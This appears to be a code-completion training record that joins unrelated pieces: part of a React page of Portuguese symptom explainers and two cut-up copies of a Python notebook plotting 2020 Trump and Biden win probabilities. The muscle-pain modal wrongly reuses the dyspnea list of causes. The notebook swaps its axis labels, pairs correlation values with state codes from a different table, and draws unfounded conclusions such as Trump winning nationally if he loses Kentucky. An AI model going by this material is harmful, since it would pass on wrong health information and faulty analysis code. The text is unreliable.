<Tow show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//terceiro
const Three = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Febre?</h4>
<p className="text-dark">
A febre é um dos sinais clínicos mais comuns no ser humano e se
caracteriza por uma elevação acima da média da temperatura corporal. A
febre é tão comum que a maioria de nós nunca parou para pensar no seu
real significado. PUBLICIDADE Geralmente associada à infecção, a febre
também pode ocorrer em diversas outras situações, como em caso de
tumores, doenças autoimunes, reação a medicamentos, etc. O corpo humano
apresenta uma temperatura normal entre 36 e 37,5ºC. Ela sofre alterações
ao longo do dia, estando mais próxima de 36ºC durante a madrugada e mais
para 37,5ºC no final da tarde. Esta variação é chamada de ciclo
circadiano da temperatura corporal. Uma temperatura de 37,5ºC no início
da manhã tem muito mais relevância do que esta mesma temperatura no
final do dia. Algumas pessoas têm naturalmente temperaturas um pouco
mais elevadas que outras, podendo apresentar algo em torno de 37,5ºC ao
final do dia sem que isso tenha qualquer significado clínico. Por outro
lado, há aqueles que possuem temperatura basal mais baixa, às vezes
próximo de 35,5ºC. Nestes, uma temperatura de 37,5ºC é algo bem acima do
seu normal. Portanto, antes de se diagnosticar uma febre, é importante
saber qual a temperatura habitual do paciente. Consideramos febre a
elevação da temperatura corporal acima da média do paciente. Como muitas
vezes não temos um histórico da variação habitual da temperatura de cada
indivíduo, usamos os valores médios encontrados em estudos para definir
os limites de temperatura que indicam febre. É importante termos em
mente também que o modo como medirmos a temperatura corporal pode
fornecer resultados diferentes. Quanto mais próximo do centro do corpo,
maior será a temperatura.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">
Quais são as principais causas de febre?
</h6>
<p className="text-dark">
As causas mais comuns de febre são as infecções. Doenças como pneumonia,
meningite, pielonefrite e endocardite (infecção das válvulas do coração)
costumam vir acompanhadas de febre alta e debilidade física. Gripe, ao
contrário do resfriado, também pode ser causa de febre alta (leia:
Diferenças entre gripe e resfriado). Quadros de febre prolongada,
normalmente por volta dos 38ºC, às vezes intermitentes ou somente
noturna, associada à perda de peso, em geral indicam infecções como
tuberculose ou AIDS. Câncer, leucemia e linfoma podem causar febre baixa
ou febrículas prolongadas. Doenças autoimunes, como lúpus, artrite
reumatoide também causam febre. Vários medicamentos podem causar febre,
incluindo antibióticos e anti-inflamatórios, por mais paradoxal que isso
possa parecer. Normalmente são reações individuais aos componentes da
droga, em um processo semelhante a uma alergia. Algumas causas menos
comuns de febre incluem:
<ul>
<li>Hipertireoidismo.</li>
<li>Excesso de exposição solar.</li>
<li>Cirurgias.</li>
<li> Traumas.</li>
<li>Feocromocitoma.</li>
<li>Embolia pulmonar.</li>
<li>Desidratação.</li>
<li>AVC (com lesão do hipotálamo).</li>
<li>Hepatite por álcool.</li>
</ul>
</p>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppFe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Febre
</button>
<Three show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quarta
const Four = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body>
<h4 className="text-dark my-2">O que é Dispneia?</h4>
<p className="text-dark">
Dispneia é a sensação de falta de ar, dificuldade de respirar ou
respiração incompleta. Geralmente essa sensação é originada por doenças
cardíacas e/ou pulmonares, mas pode ser causada por diversas outras
condições. A dispneia pode ser classificada em aguda, crônica, dispneia
de esforço, de repouso e suspirosa.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="text-dark mt-5">Causas de dispneia</h6>
<ul className="text-dark">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppDi() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dispneia
</button>
<Four show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//quinta
const Five = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor muscular?</h4>
<p className="">
A dor muscular (CID 10 M79. 1) é comum e pode envolver mais de um
músculo. Ela pode, também, envolver ligamentos, tendões e fáscias, os
tecidos moles que conectam os músculos e ossos. Pode acontecer em muitas
partes do corpo como perna, coxa, ombro, costas, pescoço, entre outros.
</p>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
A dor muscular está mais frequentemente relacionada a tensão, uso
excessivo ou lesão muscular por exercício ou trabalho fisicamente
desgastante. Nessas situações, a dor tende a envolver músculos
específicos e começa durante ou logo após a atividade. Em geral a
atividade que está causando a dor muscular é óbvia. Porém, muitas vezes
o exercício ou postura que a desencadeiam é difícil de ser de ser
reconhecido. A dor muscular também pode ser um sinal de condições que
afetam todo seu corpo, como algumas infecções (incluindo a gripe). Uma
causa comum que muitas vezes é confundida com dor muscular é a
fibromialgia, uma condição que modifica o sistema que reconhece a dor
causando dores muitas vezes generalizadas, distúrbio do sono, fadiga e
dor de cabeça. Mas inúmeras causas podem levar à dor muscular. Veja
algumas:
</p>
<ul className="">
<li>
Baixa concentração de oxigênio no ar, como em grandes altitudes;
</li>
<li>Obstrução das vias aéreas;</li>
<li>Doença cardíaca;</li>
<li> Problemas no pulmão;</li>
<li>Doenças neurológicas;</li>
<li>Medicamentos;</li>
<li>
Entre outras que levam a incapacidade do sangue carrear o oxigênio
pelo corpo, como na anemia grave, sangramentos e doenças
hematológicas.
</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppMu() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor Muscular
</button>
<Five show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
//sexta
const Six = (props) => (
<Modal
{...props}
size="lg"
aria-labelledby="contained-modal-title-vcenter"
centered
>
<Modal.Header closeButton>
<Modal.Title id="contained-modal-title-vcenter" className="text-dark">
Entenda!
</Modal.Title>
</Modal.Header>
<Modal.Body className="text-dark">
<h4 className="my-2">O que é Dor no Peito?</h4>
<p className="">
Dor no peito (CID 10 - R07) é o desconforto ou dor que uma pessoa sente
na parte frontal do corpo, geralmente abaixo do pescoço e acima do
abdômen superior. Nem sempre é sintoma de infarto, podendo ser sintoma
de outras doenças e condições. Além disso, pode vir acompanhado de falta
de ar, tontura, entre outros. A dor no peito pode atingir diferentes
intensidades e migrar para outras partes do corpo, como as costas, o
pescoço e ambos os braços. Os sintomas da dor no peito variam de acordo
com a causa da dor. Majoritariamente, a dor no peito é relacionada a
algum problema no coração. Nesses casos, os sintomas mais comuns são:
</p>
<ul>
<li>Sensação de aperto no coração</li>
<li>
Dor que se espalha pelo corpo, em regiões como costas, pescoço, nuca,
ombros e braços (especialmente o esquerdo)
</li>
<li>
Dor recorrente, que dura por alguns minutos, desaparece e retorna,
variando sempre de intensidade
</li>
<li>Pode vir junto com falta de ar, tontura, náusea e sudorese.</li>
</ul>
<h6>Alguns sintomas sugerem ser não cardíacos, como:</h6>
<ul>
<li>Gosto amargo na boca</li>
<li>Dificuldade de deglutição</li>
<li>Dor que varia de intensidade conforme você muda de posição</li>
<li>Dor que se agrava quando você respira fundo ou tosse</li>
<li>Sensibilidade na região do peito.</li>
</ul>
<Image src={Nurse} className="nurse__img" />
<h6 className="mt-5">Causas</h6>
<p>
Existem diversas causas possíveis para a dor no peito. Ela também pode
estar diretamente relacionada a alguns órgãos.
</p>
<p>Causas ligadas ao coração:</p>
<ul className="">
<li>Infarto </li>
<li>Angina</li>
<li>Dissecção aórtica</li>
<li>Pericardite.</li>
</ul>
</Modal.Body>
<Modal.Footer>
<Button onClick={props.onHide}>Close</Button>
</Modal.Footer>
</Modal>
);
function AppPe() {
const [modalShow, setModalShow] = React.useState(false);
return (
<>
<button onClick={() => setModalShow(true)} className="icons__symptoms">
Dor no Peito
</button>
<Six show={modalShow} onHide={() => setModalShow(false)} />
</>
);
}
export default Symptoms;
| .useS | identifier_name |
Data visualization_Trump Winning Rate.py | #!/usr/bin/env python
# coding: utf-8
# # Data Visualization: Trump's Winning Rate
# This report provides detailed facts about Trump's Winning Rate and its correlation between economics indicators, both at national level and at state level
# In[5]:
import pandas as pd
import datetime
import time
import matplotlib.pyplot as plt
import matplotlib.dates as dt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
from matplotlib import cm
import numpy as np
import math
# ## 1. Trump vs. Biden Winning Rate by Time
# In[6]:
pnt = pd.read_csv('presidential_national_toplines_2020.csv')
pnt['date'] = pnt['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
date = pnt['date']
y1 = pnt['ecwin_inc']
y2 = pnt['ecwin_chal']
pnt_win=pd.DataFrame({'date': date, 'Trump': y1, 'Biden': y2})
# In[7]:
import seaborn as sns
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
y = [df['Trump'].tolist(),df['Biden']-df['Trump']]
pal = sns.color_palette("Set1")
ax.stackplot(df['date'], y ,labels=['Trump','Biden'], colors=pal, alpha=0.4 )
ax.legend(loc='upper left')
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# In[8]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
# Add x-axis and y-axis
ax.plot(df['date'],df['Trump'], color='red', label = 'Trump Winning Rate')
ax.plot(df['date'],df['Biden'],color='darkblue', label = 'Biden Winning Rate', linestyle='dashed')
# Set title and labels for axes
ax.set(xlabel="date",
ylabel="Winning rate of the election 2020",
title="Trump vs. Biden")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.legend()
plt.show()
# * Trump's winning rate has a declining trend and the winning rate gap between Biden and Trump is enlarging since the beginning of September
# ## 2. Trump's Winning Rate Changes over Time
# In[9]:
pnt_diff = pnt_win.set_index('date').sort_values(by='date').diff().dropna().reset_index()
# In[10]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_diff
# Add x-axis and y-axis
ax.scatter(df['date'],df['Trump'],c= df['Trump'].apply(lambda x: math.floor(-10000*x)))
ax.plot(df['date'], df['Trump'],color='grey')
ax.plot(df['date'],[0]*132,color='lightblue')
# Set title and labels for axes
ax.set(xlabel="date", ylabel="Daily changes in winning rate",title="Variation in winning rate: Trump")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * Trump's winning rate fluctuate a lot from June to August: There are large jumps and drops.
# * However, since the beginning of September, the fluctuation is smaller and the winning rate drops for most of the times.
# ## 3. Trump's Winning Rate at State Level
# In[11]:
us_state_abbrev = {'Alabama': 'AL', 'Alaska': 'AK','American Samoa': 'AS','Arizona': 'AZ', 'Arkansas': 'AR',
'California': 'CA','Colorado': 'CO','Connecticut': 'CT', 'Delaware': 'DE','District of Columbia': 'DC','Florida': 'FL',
'Georgia': 'GA','Guam': 'GU','Hawaii': 'HI','Idaho': 'ID','Illinois': 'IL','Indiana': 'IN','Iowa': 'IA','Kansas': 'KS','Kentucky': 'KY','Louisiana': 'LA',
'Maine': 'ME','Maryland': 'MD','Massachusetts': 'MA','Michigan': 'MI','Minnesota': 'MN','Mississippi': 'MS','Missouri': 'MO',
'Montana': 'MT','Nebraska': 'NE','Nevada': 'NV','New Hampshire': 'NH','New Jersey': 'NJ','New Mexico': 'NM','New York': 'NY',
'North Carolina': 'NC','North Dakota': 'ND','Northern Mariana Islands':'MP','Ohio': 'OH','Oklahoma': 'OK','Oregon': 'OR','Pennsylvania': 'PA',
'Puerto Rico': 'PR','Rhode Island': 'RI','South Carolina': 'SC','South Dakota': 'SD', 'Tennessee': 'TN','Texas': 'TX','Utah': 'UT','Vermont': 'VT','Virgin Islands': 'VI','Virginia': 'VA',
'Washington': 'WA','West Virginia': 'WV','Wisconsin': 'WI', 'Wyoming': 'WY'
}
# In[12]:
pst = pd.read_csv('presidential_state_toplines_2020.csv')
pst['date'] = pst['modeldate'].apply(lambda x:datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
pst['code'] = pst['state'].apply(lambda x: 'no' if '-' in x else us_state_abbrev[x])
pst = pst[pst['code']!='no']
# ### 3.1 Winning Rate by State-Month
# In[14]:
import plotly.graph_objects as go
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_sub['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Winning Rate",))
fig.update_layout(
title_text = 'Trump winning rate by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * From the above graphs, we can see the Trump's winning rates by state and month
# * The winning rates are particularly low in Northeast and West coast while higher in the middle states
# ### 3.2 States with the Largest Uncertainties
# In[15]:
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = -abs(pst_sub['winstate_inc']-0.5), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Uncertainty Level",))
fig.update_layout(
title_text = 'Uncertainties by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * This graphs show the uncertainty levels of Trump winning of each states by month
# * OH, GA, and IA are the three states that Trump's winning rate is close to 50%
# ### 3.3 Correlation between Trump's State level Winning Rate with National level Winning Rate
# In[16]:
pst_cat = pst_cat.set_index(['code','date'])
pst_cat = pst_cat.sort_values(by = ['code','date'])
pst_diff = pst_cat.diff().dropna()
pst_diff = pst_diff.reset_index()
# In[17]:
pst_pnt_diff_merge = pst_diff.merge(pnt_diff, on='date')
pst_pnt_merge = pst_cat.reset_index().merge(pnt_win, on='date')
# In[18]:
pst_pnt_corr = pst_pnt_merge.groupby('code')['winstate_inc','Trump'].corr().reset_index()
# In[19]:
pst_pnt_corr = pst_pnt_corr[pst_pnt_corr['level_1']=='Trump'][['code','winstate_inc']]
# In[20]:
fig = go.Figure(data=go.Choropleth(
locations=pst_pnt_corr['code'], # Spatial coordinates
z = pst_pnt_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with State Winning Rate",))
fig.update_layout(
title_text = "Correlation between Trump's State level Winning Rate with National level Winning Rate",
geo_scope='usa', # limite map scope to USA
)
fig.show()
| # * The correlation is the lowest in KY: Trump is more likely to win the national election if he lost in KY.
# ## 4. Comovement between Trump's Winning Rate and Economic Indicators
# In[21]:
ei = pd.read_csv('economic_index.csv')
ei['date'] = ei['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])) )
# In[22]:
idx1 = ei[ei['indicator']=='S&P 500'].set_index('date').rename(columns = {'current_zscore':'S&P 500'})['S&P 500']
idx2 = ei[ei['indicator']=='Personal consumption expenditures'].set_index('date').rename(columns = {'current_zscore':'Personal consumption expenditures'})['Personal consumption expenditures']
idx3 = ei[ei['indicator']=='Industrial production'].set_index('date').rename(columns = {'current_zscore':'Industrial production'})['Industrial production']
idx4 = ei[ei['indicator']=='Nonfarm payrolls'].set_index('date').rename(columns = {'current_zscore':'Nonfarm payrolls'})['Nonfarm payrolls']
idx5 = ei[ei['indicator']=='Consumer price index'].set_index('date').rename(columns = {'current_zscore':'Consumer price index'})['Consumer price index']
idx6 = ei[ei['indicator']=='Real disposable personal income'].set_index('date').rename(columns = {'current_zscore':'Real disposable personal income'})['Real disposable personal income']
idx = ei[ei['indicator']=='Average of all six indicators'].set_index('date').rename(columns = {'current_zscore':'Average of all six indicators'})['Average of all six indicators']
idx_merge = pd.merge(idx1,idx2,on='date').merge(idx3, on='date').merge(idx4, on='date').merge(idx5, on='date').merge(idx6, on='date').merge(idx, on='date')
idx_merge = idx_merge.reset_index()
# ### 4.1 National Level Comovement
# In[23]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['S&P 500'],
color='green')
ax2.scatter(df['date'],
df['S&P 500'],
c= -df['S&P 500'])
# Set title and labels for axes
ax.set_ylabel("S&P 500", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. S&P 500")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and S&P 500 before the end of September
# * The correlation between Trump's winning rate and S&P 500 becomes negative since around 9/29/2020
# In[24]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
df['Average of all six indicators'],
color='green')
ax2.scatter(df['date'],
df['Average of all six indicators'],
c= -df['Average of all six indicators'])
# Set title and labels for axes
ax.set_ylabel("Average of all six indicators", color="green")
ax2.set_ylabel("Trump winning rate", color="blue")
ax.set(title = "Trump winning rate vs. Average of all six indicators")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * There are some comovements between Trump's winning rate and average of indicators before the mid August
#
# ### 4.2 Comovement between Trump's State Level Winning Rate and Economic Indicators
# In[25]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx1, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','S&P 500'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='S&P 500'][['code','winstate_inc']]
# In[26]:
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with S&P 500",))
fig.update_layout(
title_text = 'Trump winning rate correlation with stock market',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with S&P 500 are: OH, WI, OR...
# * The states whose winning rates are highly negatively correlated with S&P 500 are: NM, OK, KS...
# * States such as MD are not likely to be affected by stock market
# In[27]:
pst_merge = pst_cat.reset_index().merge(pnt_win, on = 'date').merge(idx, on ='date')
pst_corr = pst_merge.groupby('code')['winstate_inc','Average of all six indicators'].corr().reset_index()
pst_corr = pst_corr[pst_corr['level_1']=='Average of all six indicators'][['code','winstate_inc']]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = pst_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with Average of all six indicators",))
fig.update_layout(
title_text = 'Trump winning rate correlation with economics indicators',
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The states whose winning rates are highly positively correlated with economics indicators are: OR, OH, CT...
# * The states whose winning rates are highly negatively correlated with economics indicators: NM, OK, KS...
# * States such as NE, VT, WY are not likely to be affected by economics indicators | # * The correlation is the highest in PA, UT, CO: If Trump wins these three states, he is likely to win the national election. | random_line_split |
Data visualization_Trump Winning Rate.py | #!/usr/bin/env python
# coding: utf-8
# # Data Visualization: Trump's Winning Rate
# This report provides detailed facts about Trump's Winning Rate and its correlation between economics indicators, both at national level and at state level
# In[5]:
import pandas as pd
import datetime
import time
import matplotlib.pyplot as plt
import matplotlib.dates as dt
import matplotlib.ticker as ticker
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
from matplotlib import cm
import numpy as np
import math
# ## 1. Trump vs. Biden Winning Rate by Time
# In[6]:
pnt = pd.read_csv('presidential_national_toplines_2020.csv')
pnt['date'] = pnt['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
date = pnt['date']
y1 = pnt['ecwin_inc']
y2 = pnt['ecwin_chal']
pnt_win=pd.DataFrame({'date': date, 'Trump': y1, 'Biden': y2})
# In[7]:
import seaborn as sns
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
y = [df['Trump'].tolist(),df['Biden']-df['Trump']]
pal = sns.color_palette("Set1")
ax.stackplot(df['date'], y ,labels=['Trump','Biden'], colors=pal, alpha=0.4 )
ax.legend(loc='upper left')
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# In[8]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
# Add x-axis and y-axis
ax.plot(df['date'],df['Trump'], color='red', label = 'Trump Winning Rate')
ax.plot(df['date'],df['Biden'],color='darkblue', label = 'Biden Winning Rate', linestyle='dashed')
# Set title and labels for axes
ax.set(xlabel="date",
ylabel="Winning rate of the election 2020",
title="Trump vs. Biden")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.legend()
plt.show()
# * Trump's winning rate has a declining trend and the winning rate gap between Biden and Trump is enlarging since the beginning of September
# ## 2. Trump's Winning Rate Changes over Time
# In[9]:
pnt_diff = pnt_win.set_index('date').sort_values(by='date').diff().dropna().reset_index()
# In[10]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_diff
# Add x-axis and y-axis
ax.scatter(df['date'],df['Trump'],c= df['Trump'].apply(lambda x: math.floor(-10000*x)))
ax.plot(df['date'], df['Trump'],color='grey')
ax.plot(df['date'],[0]*132,color='lightblue')
# Set title and labels for axes
ax.set(xlabel="date", ylabel="Daily changes in winning rate",title="Variation in winning rate: Trump")
# Define the date format
date_form = DateFormatter("%m-%d")
ax.xaxis.set_major_formatter(date_form)
# Ensure a major tick for each week using (interval=1)
ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))
plt.show()
# * Trump's winning rate fluctuate a lot from June to August: There are large jumps and drops.
# * However, since the beginning of September, the fluctuation is smaller and the winning rate drops for most of the times.
# ## 3. Trump's Winning Rate at State Level
# In[11]:
us_state_abbrev = {'Alabama': 'AL', 'Alaska': 'AK','American Samoa': 'AS','Arizona': 'AZ', 'Arkansas': 'AR',
'California': 'CA','Colorado': 'CO','Connecticut': 'CT', 'Delaware': 'DE','District of Columbia': 'DC','Florida': 'FL',
'Georgia': 'GA','Guam': 'GU','Hawaii': 'HI','Idaho': 'ID','Illinois': 'IL','Indiana': 'IN','Iowa': 'IA','Kansas': 'KS','Kentucky': 'KY','Louisiana': 'LA',
'Maine': 'ME','Maryland': 'MD','Massachusetts': 'MA','Michigan': 'MI','Minnesota': 'MN','Mississippi': 'MS','Missouri': 'MO',
'Montana': 'MT','Nebraska': 'NE','Nevada': 'NV','New Hampshire': 'NH','New Jersey': 'NJ','New Mexico': 'NM','New York': 'NY',
'North Carolina': 'NC','North Dakota': 'ND','Northern Mariana Islands':'MP','Ohio': 'OH','Oklahoma': 'OK','Oregon': 'OR','Pennsylvania': 'PA',
'Puerto Rico': 'PR','Rhode Island': 'RI','South Carolina': 'SC','South Dakota': 'SD', 'Tennessee': 'TN','Texas': 'TX','Utah': 'UT','Vermont': 'VT','Virgin Islands': 'VI','Virginia': 'VA',
'Washington': 'WA','West Virginia': 'WV','Wisconsin': 'WI', 'Wyoming': 'WY'
}
# In[12]:
pst = pd.read_csv('presidential_state_toplines_2020.csv')
pst['date'] = pst['modeldate'].apply(lambda x:datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])))
pst['code'] = pst['state'].apply(lambda x: 'no' if '-' in x else us_state_abbrev[x])
pst = pst[pst['code']!='no']
# ### 3.1 Winning Rate by State-Month
# In[14]:
import plotly.graph_objects as go
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
|
# * From the above graphs, we can see the Trump's winning rates by state and month
# * The winning rates are particularly low in Northeast and West coast while higher in the middle states
# ### 3.2 States with the Largest Uncertainties
# In[15]:
pst_cat = pst[['date','winstate_inc','code']]
datevar = pst_cat['date'].drop_duplicates()[0:-1:30]
for date in datevar:
pst_sub = pst_cat[pst_cat['date'] == date]
fig = go.Figure(data=go.Choropleth(
locations=pst_sub['code'], # Spatial coordinates
z = -abs(pst_sub['winstate_inc']-0.5), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Uncertainty Level",))
fig.update_layout(
title_text = 'Uncertainties by state:'+ str(date.date()),
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * This graphs show the uncertainty levels of Trump winning of each states by month
# * OH, GA, and IA are the three states that Trump's winning rate is close to 50%
# ### 3.3 Correlation between Trump's State level Winning Rate with National level Winning Rate
# In[16]:
pst_cat = pst_cat.set_index(['code','date'])
pst_cat = pst_cat.sort_values(by = ['code','date'])
pst_diff = pst_cat.diff().dropna()
pst_diff = pst_diff.reset_index()
# In[17]:
pst_pnt_diff_merge = pst_diff.merge(pnt_diff, on='date')
pst_pnt_merge = pst_cat.reset_index().merge(pnt_win, on='date')
# In[18]:
pst_pnt_corr = pst_pnt_merge.groupby('code')['winstate_inc','Trump'].corr().reset_index()
# In[19]:
pst_pnt_corr = pst_pnt_corr[pst_pnt_corr['level_1']=='Trump'][['code','winstate_inc']]
# In[20]:
fig = go.Figure(data=go.Choropleth(
locations=pst_pnt_corr['code'], # Spatial coordinates
z = pst_pnt_corr['winstate_inc'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'blues',
colorbar_title = "Correlation with State Winning Rate",))
fig.update_layout(
title_text = "Correlation between Trump's State level Winning Rate with National level Winning Rate",
geo_scope='usa', # limite map scope to USA
)
fig.show()
# * The correlation is the highest in PA, UT, CO: If Trump wins these three states, he is likely to win the national election.
# * The correlation is the lowest in KY: Trump is more likely to win the national election if he lost in KY.
# ## 4. Comovement between Trump's Winning Rate and Economic Indicators
# In[21]:
ei = pd.read_csv('economic_index.csv')
ei['date'] = ei['modeldate'].apply(lambda x: datetime.datetime(int(x.split('/')[2]),int(x.split('/')[0]),int(x.split('/')[1])) )
# In[22]:
idx1 = ei[ei['indicator']=='S&P 500'].set_index('date').rename(columns = {'current_zscore':'S&P 500'})['S&P 500']
idx2 = ei[ei['indicator']=='Personal consumption expenditures'].set_index('date').rename(columns = {'current_zscore':'Personal consumption expenditures'})['Personal consumption expenditures']
idx3 = ei[ei['indicator']=='Industrial production'].set_index('date').rename(columns = {'current_zscore':'Industrial production'})['Industrial production']
idx4 = ei[ei['indicator']=='Nonfarm payrolls'].set_index('date').rename(columns = {'current_zscore':'Nonfarm payrolls'})['Nonfarm payrolls']
idx5 = ei[ei['indicator']=='Consumer price index'].set_index('date').rename(columns = {'current_zscore':'Consumer price index'})['Consumer price index']
idx6 = ei[ei['indicator']=='Real disposable personal income'].set_index('date').rename(columns = {'current_zscore':'Real disposable personal income'})['Real disposable personal income']
idx = ei[ei['indicator']=='Average of all six indicators'].set_index('date').rename(columns = {'current_zscore':'Average of all six indicators'})['Average of all six indicators']
idx_merge = pd.merge(idx1,idx2,on='date').merge(idx3, on='date').merge(idx4, on='date').merge(idx5, on='date').merge(idx6, on='date').merge(idx, on='date')
idx_merge = idx_merge.reset_index()
# ### 4.1 National Level Comovement
# In[23]:
fig, ax = plt.subplots(figsize=(14, 4))
df = pnt_win
ax.scatter(df['date'],
df['Trump'],
c= -df['Trump'])
ax.plot(df['date'],
df['Trump'],
color='blue')
ax2=ax.twinx()
df = idx_merge
ax2.plot(df['date'],
